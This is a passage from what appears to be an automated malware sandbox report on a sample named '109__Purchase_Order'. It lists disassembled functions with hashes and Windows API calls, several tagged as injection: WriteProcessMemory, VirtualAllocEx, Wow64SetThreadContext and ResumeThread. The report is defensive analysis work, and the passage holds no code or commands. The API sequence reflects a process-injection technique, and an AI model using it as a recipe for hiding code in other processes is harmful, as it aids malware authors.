Function 02F7591C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02F759D9

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4e28f4a88118b9ae5fd7109276544e0171d21095a597f20a95a878308e81debb
Instruction ID: 602819a779d189b995acdbc276bb98f5cbf940d0034da40a2e670cdb2d7a462f
Opcode Fuzzy Hash: 4e28f4a88118b9ae5fd7109276544e0171d21095a597f20a95a878308e81debb
Instruction Fuzzy Hash: 5A4104B0D00729CFDB24CFA9C9847DEBBB5BF49304F24806AD418AB265DB755949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02FF0007 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02FF00C0

Memory Dump Source

Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3fc81b5e15038f06191dc8ca07eed5692f5860eb9259868a1db7561ab3e9a34d
Instruction ID: 465dba4cd0c1520c4236c40e2e76bfb7ba80d97cc9256a0166a554493a957a67
Opcode Fuzzy Hash: 3fc81b5e15038f06191dc8ca07eed5692f5860eb9259868a1db7561ab3e9a34d
Instruction Fuzzy Hash: 24319E719053899FCB11CFA9C844ADEBFF0FF4A314F1884AAD588AB262C7385845CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02F7A878 Relevance: 1.6, APIs: 1, Instructions: 79
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B121,00000800,00000000,00000000), ref: 02F7B332

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d38e92343b02259c64dd1b2d73a503174cc44593b8b3cddb15d1286f73a3a540
Instruction ID: f1e0d6ad9ddf3a78bbae2bf651992368f7a05198d62f7f7250b3fb6c9f58f97e
Opcode Fuzzy Hash: d38e92343b02259c64dd1b2d73a503174cc44593b8b3cddb15d1286f73a3a540
Instruction Fuzzy Hash: 9631DDB68043988FDB11DFA9C854ADEBFF4EF5A314F0580AAC554AB212C3349549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F7FEAF Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F7FF40

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f625d329331f8d11f3eeef7be0a6572b0dcc3dd52bccf60a08231e54a2f076ec
Instruction ID: 06d014203d019405d03ab8503b16be3cdd5abd4d74cebdbf2d0d57cfa1776bff
Opcode Fuzzy Hash: f625d329331f8d11f3eeef7be0a6572b0dcc3dd52bccf60a08231e54a2f076ec
Instruction Fuzzy Hash: 812157B1900359DFCB10CFA9C885BEEBBF4FF48314F10842AE958A7250C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F7FEB0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F7FF40

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 36520a7b9562b2589fb565b46c35c9f81533a16c362c1ece2b316ec2875064c1
Instruction ID: 438eeff2001b5b9e9847864c05bf67288e176c84846a2b7d6ae40196a6dce4f8
Opcode Fuzzy Hash: 36520a7b9562b2589fb565b46c35c9f81533a16c362c1ece2b316ec2875064c1
Instruction Fuzzy Hash: A82155B1900359DFCB10CFA9C884BEEBBF4FF48324F10842AE958A7250C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F7C9C0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7D2E6,?,?,?,?,?), ref: 02F7D3A7

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 882e1c4ff7b857a9ecdd5f9630e794adca07a9fefb1cb182f39f481da8c73c9d
Instruction ID: bc7f493778fb271176c3dc7f5549b736a21eb452214f96711863b521ba68216f
Opcode Fuzzy Hash: 882e1c4ff7b857a9ecdd5f9630e794adca07a9fefb1cb182f39f481da8c73c9d
Instruction Fuzzy Hash: 722103B59002489FDB10CF9AD984ADEBBF4EB48314F54805AE918A7310D374A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F7D319 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7D2E6,?,?,?,?,?), ref: 02F7D3A7

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d4a3918f05ad0246b073b57ac22ffe433972e6c7bd8a10297fa16223b200e0e1
Instruction ID: 92a79ff0681d330910e9f8826fd18246a8f8ec35f8bef94eedae5c087cb368ee
Opcode Fuzzy Hash: d4a3918f05ad0246b073b57ac22ffe433972e6c7bd8a10297fa16223b200e0e1
Instruction Fuzzy Hash: 5B2112B5D002599FDB10CFAAD984AEEBBF4FB48314F14802AE958A3310C338A954CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02FF0040 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02FF00C0

Memory Dump Source

Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 17970a53891a8fc32af22ebf09607605a1691ccf7a3fa0d92fd7eb8b777a1ddb
Instruction ID: 4823beddc812c17a57018eb606744ef21dd1ea1aa64ad44337e2c67ec5dc400a
Opcode Fuzzy Hash: 17970a53891a8fc32af22ebf09607605a1691ccf7a3fa0d92fd7eb8b777a1ddb
Instruction Fuzzy Hash: B72128B1D003599FCB10DFAAC944ADEBBF5FF48320F108429E559A7251D7749544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BAF580 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05BAF5FE

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8a8c17f6bff7491e7af312164a27ddacacebb2e03d0e677c2c4cbe566443a063
Instruction ID: 03d7a47c5bb4214b5959403bcd092e99dc5b23ff93ac1452db8678b2c9501461
Opcode Fuzzy Hash: 8a8c17f6bff7491e7af312164a27ddacacebb2e03d0e677c2c4cbe566443a063
Instruction Fuzzy Hash: 112149729043099FDB10DFAAC4857EEBBF4FF88324F10842AD459A7250CB78A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BAF57B Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05BAF5FE

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f64f00df9795cdef281d7149af043499e0af1d6c7ab3c459614e98aeeb6dbbbf
Instruction ID: 5b1aa71d65f8cb0e3c8cf43c6c15f81708366ac5a54c80431be75e79b86d0712
Opcode Fuzzy Hash: f64f00df9795cdef281d7149af043499e0af1d6c7ab3c459614e98aeeb6dbbbf
Instruction Fuzzy Hash: 322168769043088FDB10CFAAC4857EEBBF4EF88324F10842AD459A7251C778A985CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BAFEC1 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05BAFF36

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4920135356e2ba58b1a4211b3d2aedacad0e00f10cdf8eef575c0ab47981c62d
Instruction ID: eda3c6e4eee613187219521011e32f3e3d3990ef065bdf8ef4e42c810ef6dfbb
Opcode Fuzzy Hash: 4920135356e2ba58b1a4211b3d2aedacad0e00f10cdf8eef575c0ab47981c62d
Instruction Fuzzy Hash: 7D21CD728043888FCB20CFA9C445BEFBFF5EF48320F20845AE555A7251C735A554CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F7A890 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B121,00000800,00000000,00000000), ref: 02F7B332

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 86d5488f800344f39522a7409ca21ec6e7473da553ddcaf4b566acc422eb720f
Instruction ID: db03183f0fe6fff708b085075c258cf484fce49cea0beb208f751ffd02043a8a
Opcode Fuzzy Hash: 86d5488f800344f39522a7409ca21ec6e7473da553ddcaf4b566acc422eb720f
Instruction Fuzzy Hash: 6F1126B6D003488FDB10CF9AC448ADEFBF4EB49314F10846ED519AB210C375A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BAF4C8 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05BAF532

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0ef3732ab416199c375a917e538874402b04747ad0fa40fb961f0a75525d9a83
Instruction ID: 68c0a6d94485d0696cd8abaefc419a4d8ed0a93e857188a9769be83a5e364e22
Opcode Fuzzy Hash: 0ef3732ab416199c375a917e538874402b04747ad0fa40fb961f0a75525d9a83
Instruction Fuzzy Hash: 171176B29043488FCB20DFAAC4457EEFFF4EB88324F208469C459A7240CA35A545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F7B2C1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B121,00000800,00000000,00000000), ref: 02F7B332

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 48649049a86cb4201d7d99963708d07d82df5c00bb93502580b9e17b619d0ec3
Instruction ID: 0d0114185f23a1428ea42c70cf8083966cd7ed6f5c30c8075822c77dbd94b996
Opcode Fuzzy Hash: 48649049a86cb4201d7d99963708d07d82df5c00bb93502580b9e17b619d0ec3
Instruction Fuzzy Hash: 681123B6D003488FDB14CF9AC944ADFFBF4EB48314F10846AE919A7210C375A685CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05BAFEC8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05BAFF36

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1a15ceac9008185ba861d531f4c9556a46984aa086924b2da450ea06a98d44ce
Instruction ID: ff1eb3348dddaefac5364c520d37d763570d080a2529a3c4fde43cb7db1ab072
Opcode Fuzzy Hash: 1a15ceac9008185ba861d531f4c9556a46984aa086924b2da450ea06a98d44ce
Instruction Fuzzy Hash: 3C1137769042499FCB10DFAAC844BEFBFF5EF48324F108419E559A7250C775A554CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02FF23D9 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02FF243D

Memory Dump Source

Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3be6a70ec8ce0977626f6842377ded5b704c6a6e20089a4260c7df2e9a503b52
Instruction ID: ec30a1b6b8b45f30702ec4f0791b3416d808932e4615dcf19f49d88007149736
Opcode Fuzzy Hash: 3be6a70ec8ce0977626f6842377ded5b704c6a6e20089a4260c7df2e9a503b52
Instruction Fuzzy Hash: 531146B58003589FDB10CF99C585BDEBFF8EB48324F20845ADA54A7250C3B5A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05BAF4D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05BAF532

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c042f0a39e77b0b6d3a4fe3ca4d598aa11dd3bd8aff4fc08a300dacbfa2e2c44
Instruction ID: 3240066dd1feb959f76bfb444792824dae8e0ce6bafb9a76484505a2785ad284
Opcode Fuzzy Hash: c042f0a39e77b0b6d3a4fe3ca4d598aa11dd3bd8aff4fc08a300dacbfa2e2c44
Instruction Fuzzy Hash: B9113AB2D043488FCB24DFAAC4457EEFBF5EB88324F208469D559A7250C775A544CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02F7B040 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F7B0A6

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ea93d80247d97ca6d42939b1be566d32d8669d68e041e931a86e9497f959499e
Instruction ID: 35e76c24593326c44fa8c22e1d609c4332de66f965ca85fa20cb5c0723a67796
Opcode Fuzzy Hash: ea93d80247d97ca6d42939b1be566d32d8669d68e041e931a86e9497f959499e
Instruction Fuzzy Hash: 241113B6D003498FCB20DF9AC444ADEFBF4BB89318F10846AD569B7210D375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02FF23E0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02FF243D

Memory Dump Source

Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6c2069c47771e5e4d0ef344c5ccf8dde241aab3fea4ba4483fef5d359f5c7663
Instruction ID: f4282197c0d03ecaa515dd4c379ba5afa17a51a8d2e3882276841f19079ae41f
Opcode Fuzzy Hash: 6c2069c47771e5e4d0ef344c5ccf8dde241aab3fea4ba4483fef5d359f5c7663
Instruction Fuzzy Hash: B41103B58003489FCB10DF9AC585BDEBBF8EB48324F108459DA58A7210C375A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0150D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687034001.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150d000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ac60ce7ce078914573dd69aeb64595cd7bd5edc5bc1918a5c420f8993a6690
Instruction ID: 779353659703679729aef92d6471734af191288d2db5ca2db999c4f3ad635138
Opcode Fuzzy Hash: e2ac60ce7ce078914573dd69aeb64595cd7bd5edc5bc1918a5c420f8993a6690
Instruction Fuzzy Hash: AC214871100200DFDB02DFC8C9C0B6ABFB5FB84324F20C569E9090F296C376E446C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0151D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687227030.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_151d000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f581554570de0471ef01195e76dfd5a31c0a297c456b717d97a81dcdaa8ef3
Instruction ID: 1bd78b09d19514bdd2843e8faf18d8df5f2af7d5b26cb8079fe6aa19348a6937
Opcode Fuzzy Hash: 21f581554570de0471ef01195e76dfd5a31c0a297c456b717d97a81dcdaa8ef3
Instruction Fuzzy Hash: 2C210075604200DFEB16DF58D988B2ABBB5FB84314F20C96DD80A4F25AD33AD846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0151D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687227030.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_151d000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822f00769bec24d554850ac28a69ab65d997d6e6418a2b1116f267c136e86994
Instruction ID: ba957e1f3ee2e0b2619052d3bc78724892f7dfb11fb109b3d0f622edb7b259e4
Opcode Fuzzy Hash: 822f00769bec24d554850ac28a69ab65d997d6e6418a2b1116f267c136e86994
Instruction Fuzzy Hash: 67219F755093808FDB03CF24D994B15BF71FB46214F28C5EAD8498F2A7C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0150D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687034001.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150d000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 3da0e26c2be68106e1f42d4e329715da3c2b89e88262f60e298d1f010beb1cba
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 0811DF72404240CFDB02CF84D5C4B5ABF71FB94324F24C2A9D9090F256C33AE45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05BA3118 Relevance: 5.5, Strings: 4, Instructions: 495COMMON

Download Yara Rule

Strings

~, xrefs: 05BA32BC
4'kq, xrefs: 05BA3440
:, xrefs: 05BA3307
poq, xrefs: 05BA3502

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 4'kq$:$poq$~
API String ID: 0-3551392484
Opcode ID: 646ceb0d1ac21afb8394087db9575d9e4a73edc3ff9604cc38ab72cb4ef0fc02
Instruction ID: a0455f6d40924db7fb3ebd6737ec8e037513c48622b165d5bc92cf8545fec819
Opcode Fuzzy Hash: 646ceb0d1ac21afb8394087db9575d9e4a73edc3ff9604cc38ab72cb4ef0fc02
Instruction Fuzzy Hash: AB32E275A04218DFDB15CFA9C944F99BBB2FF88304F1580E9E509AB262DB31AD91DF10

Uniqueness

Uniqueness Score: -1.00%

Function 05BAD058 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbf275e4dfd0977c5725a04e3e607b2fd9e5fe2dfce2f173e329b94ad9452da5
Instruction ID: 645b862a575e32803d54f19c65b65ea57c82f1aa510836f22860241bbc7bf020
Opcode Fuzzy Hash: bbf275e4dfd0977c5725a04e3e607b2fd9e5fe2dfce2f173e329b94ad9452da5
Instruction Fuzzy Hash: 85E1FC75E042598FCB14CFA9C984AAEFBB2FF89304F248169D415AB356D734AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05BAD4A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1339dfa0cd560068bebb4fbfb52113ece6c4e8621cb56cc18d540ff9416c2462
Instruction ID: bf1285baafaa966626a29143b487f3c620f557b1ecb0accc89e5f87bdc8f7206
Opcode Fuzzy Hash: 1339dfa0cd560068bebb4fbfb52113ece6c4e8621cb56cc18d540ff9416c2462
Instruction Fuzzy Hash: 46E1DA75E042198FCB14CFA9C980AAEFBB2FF89304F248169D419AB755D734AD41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05BAF658 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f59601a0168e2b04113fda0f564ba1fc29a475f7ab3c60c79cae6b9e1e27f4
Instruction ID: 47f3e7de91d36545ccb8f5608a099d841b432a5df3f64ad4133dcc394d814a8c
Opcode Fuzzy Hash: c7f59601a0168e2b04113fda0f564ba1fc29a475f7ab3c60c79cae6b9e1e27f4
Instruction Fuzzy Hash: 66E1E875E042199FCB14CFA9C980AAEFBB2FF89304F248169D415AB355D734AD81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05BAD8E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 498fbcb5dce4ff420a964d01b756b8b8fd56dd4a33081fbc6eff20e59c634a3a
Instruction ID: 80d54754f8512b8e905fe93bc2a81589f0d7045e86a2e060d6a0e86a30afcce5
Opcode Fuzzy Hash: 498fbcb5dce4ff420a964d01b756b8b8fd56dd4a33081fbc6eff20e59c634a3a
Instruction Fuzzy Hash: 7CE1D775E042198FDB14CFA9C980AAEFBB2FF89304F248169E415AB756D734AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05BAFA90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c86f63b52bb0585f7716757e513dfa7366a71287070320c8d156f7a6ffcc43
Instruction ID: 2506abbb9954679353ca497431f9850032ffa991a310c707edc10732dcfa3e4f
Opcode Fuzzy Hash: e8c86f63b52bb0585f7716757e513dfa7366a71287070320c8d156f7a6ffcc43
Instruction Fuzzy Hash: 04E11975E142198FCB14DFA9C980AAEFBB2FF89304F248169D415AB356D734AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05BA5467 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178d540b30a352037c6ce4507dc1ccd4e6e0124d4b0f2daa3c4e7a8692bca359
Instruction ID: 20caff2ed383cf3e53f0d4f79142847e6bd6e2f76dde7733a0eae0315946e8b8
Opcode Fuzzy Hash: 178d540b30a352037c6ce4507dc1ccd4e6e0124d4b0f2daa3c4e7a8692bca359
Instruction Fuzzy Hash: F6D12A31C2075A8ECB01EB65D990699B771FF95300F10C79AE5493B261EF70AEC4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F7DC94 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 089a7bcd509206d50354ca812d250f59de0616b65de9846f15bf062e1a1a687c
Instruction ID: c4aa2997549c84ee2a4fae188e63750df8da37037b5d68671a669b5a205ce722
Opcode Fuzzy Hash: 089a7bcd509206d50354ca812d250f59de0616b65de9846f15bf062e1a1a687c
Instruction Fuzzy Hash: C1A18F36E002098FCF05DFB4C9405AEBBB2FF85340B15456AEA06AB265DB75E955CF80

Uniqueness

Uniqueness Score: -1.00%

Function 05BA5478 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

